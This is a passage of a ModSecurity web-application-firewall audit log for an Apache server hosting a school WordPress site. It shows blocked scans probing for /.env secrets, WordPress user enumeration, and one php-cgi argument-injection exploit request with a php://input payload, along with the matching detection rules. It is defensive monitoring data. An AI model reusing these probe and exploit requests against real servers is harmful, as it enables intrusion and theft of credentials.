Chrome/86.0.4240.198 Safari/537.36 --b04be177-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b04be177-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747335825625516 2495 (- - -) Stopwatch2: 1747335825625516 2495; combined=1155, p1=376, p2=752, p3=0, p4=0, p5=26, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b04be177-Z-- --7c8b0a71-A-- [16/May/2025:02:45:33 +0700] aCZEXUZPp_O9UFIYjNZYVwAAAMk 103.236.140.4 39108 103.236.140.4 8181 --7c8b0a71-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.80.158.152 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.80.158.152 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --7c8b0a71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c8b0a71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747338333773907 849 (- - -) Stopwatch2: 1747338333773907 849; combined=333, p1=295, p2=0, p3=0, p4=0, p5=38, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c8b0a71-Z-- --d19ea255-A-- [16/May/2025:02:45:34 +0700] aCZEXu8rcsLSwEaopQJ_2wAAAAA 103.236.140.4 39184 103.236.140.4 8181 --d19ea255-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.80.158.152 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.80.158.152 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --d19ea255-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d19ea255-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747338334910957 642 (- - -) Stopwatch2: 1747338334910957 642; combined=283, p1=242, p2=0, p3=0, p4=0, p5=41, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d19ea255-Z-- --a84d4a76-A-- [16/May/2025:02:58:11 +0700] aCZHU0ZPp_O9UFIYjNZjWAAAAMU 103.236.140.4 55754 103.236.140.4 8181 --a84d4a76-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.217.205.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.217.205.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a84d4a76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a84d4a76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747339091785167 3114 (- - -) Stopwatch2: 1747339091785167 3114; combined=1347, p1=464, p2=853, p3=0, p4=0, p5=29, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a84d4a76-Z-- --73607d6d-A-- [16/May/2025:03:12:12 +0700] aCZKnO8rcsLSwEaopQKQJAAAAAU 103.236.140.4 37578 103.236.140.4 8181 --73607d6d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 82.135.209.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 82.135.209.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --73607d6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73607d6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747339932610690 2779 (- - -) Stopwatch2: 1747339932610690 2779; combined=1259, p1=412, p2=814, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73607d6d-Z-- --1b85995a-A-- [16/May/2025:03:13:49 +0700] aCZK_e8rcsLSwEaopQKQhAAAABY 103.236.140.4 38820 103.236.140.4 8181 --1b85995a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 8.211.143.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 8.211.143.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1b85995a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b85995a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747340029191971 2915 (- - -) Stopwatch2: 1747340029191971 2915; combined=1448, p1=493, p2=923, p3=0, p4=0, p5=32, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b85995a-Z-- --f8f19b68-A-- [16/May/2025:04:33:12 +0700] aCZdmEE0LfP59mkCzg7zHgAAANE 103.236.140.4 58936 103.236.140.4 8181 --f8f19b68-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 191.36.149.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 191.36.149.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f8f19b68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8f19b68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747344792292931 3565 (- - -) Stopwatch2: 1747344792292931 3565; combined=1500, p1=497, p2=971, p3=0, p4=0, p5=32, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8f19b68-Z-- --e59aec5a-A-- [16/May/2025:05:18:08 +0700] aCZoIMe47ocjCGWTS4b26wAAAEs 103.236.140.4 60452 103.236.140.4 8181 --e59aec5a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.11.1.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.11.1.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e59aec5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e59aec5a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747347488602967 2977 (- - -) Stopwatch2: 1747347488602967 2977; combined=1383, p1=485, p2=863, p3=0, p4=0, p5=35, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e59aec5a-Z-- --b67efa0c-A-- [16/May/2025:06:05:19 +0700] aCZzL8e47ocjCGWTS4b3YgAAAEs 103.236.140.4 33898 103.236.140.4 8181 --b67efa0c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.34.1.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.34.1.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b67efa0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b67efa0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747350319259179 3184 (- - -) Stopwatch2: 1747350319259179 3184; combined=1357, p1=493, p2=834, p3=0, p4=0, p5=30, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b67efa0c-Z-- --7619b41b-A-- [16/May/2025:06:05:59 +0700] aCZzV0E0LfP59mkCzg7zugAAAM0 103.236.140.4 33920 103.236.140.4 8181 --7619b41b-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --7619b41b-C-- --7619b41b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7619b41b-E-- --7619b41b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747350359820119 3668 (- - -) Stopwatch2: 1747350359820119 3668; combined=1983, p1=496, p2=1456, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7619b41b-Z-- --0231c52b-A-- [16/May/2025:07:12:41 +0700] aCaC-ce47ocjCGWTS4b3-AAAAEg 103.236.140.4 36228 103.236.140.4 8181 --0231c52b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.176.16.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.176.16.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0231c52b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0231c52b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747354361290574 3168 (- - -) Stopwatch2: 1747354361290574 3168; combined=1345, p1=491, p2=824, p3=0, p4=0, p5=30, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0231c52b-Z-- --8b62d256-A-- [16/May/2025:07:15:24 +0700] aCaDnMe47ocjCGWTS4b4CQAAAE0 103.236.140.4 36376 103.236.140.4 8181 --8b62d256-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 69.175.120.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 69.175.120.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8b62d256-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b62d256-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747354524812747 3504 (- - -) Stopwatch2: 1747354524812747 3504; combined=1528, p1=541, p2=950, p3=0, p4=0, p5=37, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b62d256-Z-- --e1788b7b-A-- [16/May/2025:08:38:35 +0700] aCaXG9e6THFz1hsaJaKOqgAAAAM 103.236.140.4 37980 103.236.140.4 8181 --e1788b7b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 54.36.176.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 54.36.176.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e1788b7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1788b7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747359515930767 3281 (- - -) Stopwatch2: 1747359515930767 3281; combined=1421, p1=482, p2=907, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1788b7b-Z-- --9ac36f21-A-- [16/May/2025:08:56:58 +0700] aCabase47ocjCGWTS4b4gwAAAEU 103.236.140.4 38212 103.236.140.4 8181 --9ac36f21-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.8.29.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.8.29.105 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9ac36f21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ac36f21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747360618931542 3428 (- - -) Stopwatch2: 1747360618931542 3428; combined=1467, p1=466, p2=970, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ac36f21-Z-- --a669ba74-A-- [16/May/2025:09:09:43 +0700] aCaeZ9e6THFz1hsaJaKO1AAAAA4 103.236.140.4 38420 103.236.140.4 8181 --a669ba74-B-- GET /.env HTTP/1.0 Referer: https://google.com Host: 103.236.140.4 X-Real-IP: 37.187.139.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 37.187.139.239 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0 Safari/537.36 Accept: */* --a669ba74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a669ba74-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747361383118354 679 (- - -) Stopwatch2: 1747361383118354 679; combined=261, p1=227, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a669ba74-Z-- --9c9bfd65-A-- [16/May/2025:09:30:21 +0700] aCajPdhEtho3ciA0wegexwAAAIs 103.236.140.4 38678 103.236.140.4 8181 --9c9bfd65-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 175.117.144.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 175.117.144.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9c9bfd65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c9bfd65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747362621909041 3221 (- - -) Stopwatch2: 1747362621909041 3221; combined=1429, p1=508, p2=893, p3=0, p4=0, p5=28, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c9bfd65-Z-- --5802f73c-A-- [16/May/2025:09:37:00 +0700] aCakzMe47ocjCGWTS4b4nAAAAEA 103.236.140.4 38774 103.236.140.4 8181 --5802f73c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 162.214.55.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5802f73c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5802f73c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747363020361994 3253 (- - -) Stopwatch2: 1747363020361994 3253; combined=1443, p1=502, p2=908, p3=0, p4=0, p5=32, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5802f73c-Z-- --381bbd55-A-- [16/May/2025:09:45:13 +0700] aCamudhEtho3ciA0wege2AAAAJI 103.236.140.4 38868 103.236.140.4 8181 --381bbd55-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.53.16.242 X-Forwarded-Host: smkn22-jkt.sch.id 